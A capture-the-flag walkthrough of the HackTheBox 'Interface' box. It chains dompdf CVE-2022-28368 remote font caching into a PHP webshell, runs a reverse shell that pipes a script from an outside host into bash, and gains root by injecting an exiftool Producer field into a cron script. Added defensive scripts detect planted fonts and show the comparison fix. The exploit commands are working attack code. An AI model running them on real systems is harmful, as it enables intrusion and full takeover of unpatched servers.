
hackthebox htb interface: CVE

This box tests: CVE-2022-28368

CVE-2022-28368 - RCE via remote CSS font cache installation

References:

hackthebox-interface, information gathering: an nmap port scan found 22 and 80 open (PORT STATE SERVICE REASON / 22/tcp open ssh syn-ack ...)

dompdf-rce/exploit

cd /tmp;
git clone 
cd dompdf-rce;
cd /tmp/dompdf-rce/exploit/;
cat  exploit.css
sed -i "s/localhost:9001/10.10.14.53/g"  exploit.css;
cp exploit_font.php exploit_font.php.bak;sed -i "s|\(<?php phpinfo(); ?>\)|<?php eval(\$_POST[2]);|g" exploit_font.php; 
tail exploit_font.php;cd /tmp/dompdf-rce/exploit/;
python -m http.server 80 & 

Next, send the POST request (from a Windows 10 x64 cmd prompt):

Note that ^< and ^> are cmd escapes.

-x sends the request through the BurpSuite HTTP proxy on 8080; remove it if you don't need the proxy.

curl -v -x http://127.0.0.1:8080 -d  "{\"html\": \"title=^<link rel=stylesheet href='.css'^>\"}"  "/api/html2pdf"

Compute the md5:

echo -n ".php" | md5sum
ae6cfa0a356a3b98582afa39ee67bf43  -

Finally, the reverse shell:

curl -v -x http://127.0.0.1:8080 -d "2=system('curl+10.10.14.53:30088/ccc.sh|bash');" /vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php

Note the path:

/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php
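As an added defender-side check, not part of this write-up or of dompdf itself: a script that scans a dompdf lib/fonts directory for files that are PHP rather than fonts, which is exactly what the remote font fetch leaves behind. The sample directory it builds and its file names are constructed for the demo (the exploitfont name follows the path above).

```shell
#!/bin/sh
# Added example (not from the write-up or dompdf): spot planted "fonts" in a
# dompdf lib/fonts directory. dompdf stores a remotely fetched font as
# <family>_<weight>_<md5 of its URL> plus the REMOTE file's extension, so a
# font served as .php is written into the font cache as runnable PHP (the
# exploitfont_normal_<md5>.php path in this write-up). A genuine font never
# starts with "<?php". The sample directory below is constructed for the demo.

# Print the names of files in $1 that are PHP rather than fonts: any *.php
# other than dompdf's own font family cache, or any file starting with "<?php".
find_planted_fonts() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        case "$name" in
            dompdf_font_family_cache.php) continue ;;
            *.php) echo "$name"; continue ;;
        esac
        if head -c 5 "$f" | grep -q '^<?php'; then
            echo "$name"
        fi
    done
}

# Number of planted files under $1.
count_planted_fonts() {
    find_planted_fonts "$1" | wc -l | tr -d ' '
}

# Build a constructed sample directory: the legitimate cache file, a file with
# an OpenType-style header, a PHP file named like a cached remote font, and a
# PHP payload hiding behind a .ttf name. Prints the directory path.
make_sample_dir() {
    d=$(mktemp -d)
    printf '<?php return array();' > "$d/dompdf_font_family_cache.php"
    printf 'OTTO binary font data' > "$d/DejaVuSans.ttf"
    printf '<?php phpinfo();' > "$d/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php"
    printf '<?php phpinfo();' > "$d/webfont_bold_0123456789abcdef0123456789abcdef.ttf"
    echo "$d"
}

sample=$(make_sample_dir)
echo "planted files in $sample:"
find_planted_fonts "$sample"
rm -rf "$sample"
```

Point find_planted_fonts at the real /var/www/api/vendor/dompdf/dompdf/lib/fonts/ to check a deployment; anything it prints should not be there.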

Next, privilege escalation:

bash-4.4$ grep bash /etc/passwd;
root:x:0:0:root:/root:/bin/bash
dev:x:1000:1000:,,,:/home/dev:/bin/bash
bash-4.4$ 

Upload pspy64 to the target and run it to watch the processes.

A shell script running as root that works on user files shows up, which is very suspicious:

2023/05/20 10:41:25 CMD: UID=0     PID=1      | /sbin/init maybe-ubiquity 
2023/05/20 10:42:01 CMD: UID=0     PID=33487  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33486  | /bin/sh -c /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33485  | /usr/sbin/CRON -f 
2023/05/20 10:42:01 CMD: UID=0     PID=33490  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33489  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33488  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33491  | 
2023/05/20 10:42:01 CMD: UID=0     PID=33492  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33494  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33493  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/test_original 
2023/05/20 10:42:01 CMD: UID=0     PID=33497  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/05/20 10:42:01 CMD: UID=0     PID=33496  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/yyxx 
2023/05/20 10:42:01 CMD: UID=0     PID=33495  | /bin/bash /usr/local/sbin/cleancache.sh 

ls -al /usr/local/sbin/cleancache.sh; cat /usr/local/sbin/cleancache.sh
#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
    if [[ -f "$cfile" ]]; then
        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"
        fi
    fi
done

cat <<EOF>/tmp/.xxyy.sh
#!/bin/bash
id>/tmp/.iidd123;
chattr +a /tmp/.iidd123;
chmod +s /bin/bash;
EOF
chmod +x /tmp/.xxyy.sh;
chattr +a /tmp/.xxyy.sh;
touch /tmp/.yy22;
/usr/bin/exiftool -Producer='a[$(/tmp/.xxyy.sh>&2)]+42' /tmp/.yy22;
ln -s /tmp/.yy22 /tmp/yy22;
# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22
# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 2>/dev/null | cut -d " " -f1

<pdf:Producer>x[$(touch /tmp/0xdf)]</pdf:Producer>
bash-4.4$ /usr/bin/exiftool -s -s -s -Producer /tmp/test_original
x[$(touch /tmp/0xdf)]
bash-4.4$

The execution is actually triggered inside the if test; the test commands are as follows:

meta_producer=$(echo "a[\$(/tmp/.xxyy.sh>&2)]+4");
echo "$meta_producer"
if [[ "$meta_producer" -eq "dompdf" ]]; then
    echo "Removing 123123"
fi
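The comparison bug behind this privilege escalation, as an added example that is not from the write-up: the vulnerable -eq test from cleancache.sh next to the == test that fixes it, exercised with a constructed Producer value whose only side effect is writing a marker file. It assumes bash is installed; each check runs in a child bash so the script itself also works from sh.

```shell
#!/bin/sh
# Added example (not from the write-up): the comparison bug that makes
# cleancache.sh exploitable, next to the fixed comparison. Inside [[ ]], -eq
# evaluates BOTH operands as arithmetic expressions, so a Producer value like
# 'a[$(cmd)]+42' has its $(cmd) run by whoever does the comparison (root via
# cron on this box). Each check runs in a child bash so this file also works
# from a POSIX sh; bash must be installed.

# Vulnerable comparison, exactly as in /usr/local/sbin/cleancache.sh.
producer_check_unsafe() {
    bash -c '[[ "$1" -eq "dompdf" ]] && echo yes || echo no' _ "$1"
}

# Fixed comparison: == compares the string itself; nothing is evaluated.
producer_check_safe() {
    bash -c '[[ "$1" == "dompdf" ]] && echo yes || echo no' _ "$1"
}

# Run one of the checks on a constructed Producer value whose command
# substitution only writes a marker file (stand-in for the script cron ran).
# $1 is "unsafe" or "safe"; prints "<verdict> <marker contents or none>".
run_with_injected_producer() {
    marker=$(mktemp)
    payload="a[\$(echo ran > $marker; echo 0)]+42"
    if [ "$1" = unsafe ]; then
        verdict=$(producer_check_unsafe "$payload")
    else
        verdict=$(producer_check_safe "$payload")
    fi
    written=$(cat "$marker")
    rm -f "$marker"
    echo "$verdict ${written:-none}"
}

main() {
    # Any bare word is an unset variable, i.e. 0, so 0 -eq 0 "matches" everything:
    # the unsafe check would also delete files whose Producer is LibreOffice.
    echo "unsafe dompdf:      $(producer_check_unsafe dompdf)"       # yes
    echo "unsafe LibreOffice: $(producer_check_unsafe LibreOffice)"  # yes
    echo "safe   LibreOffice: $(producer_check_safe LibreOffice)"    # no
    echo "unsafe injected:    $(run_with_injected_producer unsafe)"  # no ran
    echo "safe   injected:    $(run_with_injected_producer safe)"    # no none
}
main
```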

Finally, bash -p:

bash-4.4# cat /root/root.txt 
02246920fd2785965ecf72ecaa22d8f3
bash-4.4# 
bash-4.4# cat /home/dev/user.txt 
f8e3acc434850f1527f6860f4b1222eb
bash-4.4# 

Afterwards:

# id
uid=0(root) gid=0(root) groups=0(root)
# crontab  -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/2 * * * * /usr/local/sbin/cleancache.sh
*/5 * * * * /root/clean.sh
# # bash
root@interface:/tmp# cat /root/clean.sh 
#! /bin/bash
find /var/www/api/vendor/dompdf/dompdf/lib/fonts/ -type f -cmin -5 -exec rm {} \;
cp /root/font_cache/dompdf_font_family_cache.php.bak /root/font_cache/dompdf_font_family_cache.php
chown www-data /root/font_cache/dompdf_font_family_cache.php
chgrp www-data /root/font_cache/dompdf_font_family_cache.php
mv /root/font_cache/dompdf_font_family_cache.php /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
root@interface:/tmp# uname -a
Linux interface 4.15.0-202-generic #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@interface:/tmp# cat /etc/os-release 
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="/"
SUPPORT_URL="/"
BUG_REPORT_URL="/"
PRIVACY_POLICY_URL=""
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
root@interface:/tmp# free -h
              total        used        free      shared  buff/cache   available
Mem:           1.9G        233M        690M         14M        1.0G        1.5G
Swap:          1.0G          0B        1.0G
root@interface:/var/www/html# cat /var/www/api/vendor/dompdf/dompdf/VERSION;
1.2.0
bash-4.4$ cat /var/www/api/composer.json;
{
    "require": {
        "bramus/router": "~1.6",
        "dompdf/dompdf": "1.2.0"
    }
}
bash-4.4$

Related articles:

CTF_challenges/MRCTF2022/tprint at main · Snakinya/CTF_challenges · GitHub

dompdf 0day (RCE) reproduction | 郁涛丶's Blog
